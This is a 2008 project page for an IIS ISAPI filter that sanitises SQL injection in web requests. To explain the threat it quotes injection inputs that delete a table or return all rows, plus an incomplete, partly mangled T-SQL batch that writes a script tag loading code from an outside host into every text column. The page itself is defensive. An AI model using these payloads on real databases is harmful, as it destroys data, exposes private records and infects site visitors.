Project Description

This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.

Version 2.0 is available and it includes a configuration application which enables you to enable log and to exclude files from being filtered. Logging capabilities will enable you to verify the attacks you are suffering.


This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT support ISAPI Wildcard.


SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example:

stringSQL = "SELECT * FROM users WHERE userName = \'" UserId.Text "\';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If the UserId is entered as: '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

Forcing the return of all rows from table "users".

More sophisticated attack using inline:

… = a few hundred chars that were not included (hex encoded values)

Which translate to the following T-SQL batch:
DECLARE @T varchar(255),@C varchar(255)
select, from sysobjects a,syscolumns b where and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
exec(’update ['@T'] set ['@C']=rtrim(convert(varchar,['@C']))+”<script src=http://www.211796*.net/f****}p.js></script>”’)
CLOSE Table_Cursor

See more about this kind of attack here:

This category of attack is also completely blocked by the filter since the very beta version

By Rodney Viana

Download Installer
First Release

A video describing the step-by-step installation is available here: First Release

You can also see written instructions in this Discussion thread: Installation

64-bit beta version is released

I need beta testers.

Last edited Nov 5, 2008 at 4:50 PM by rviana, version 19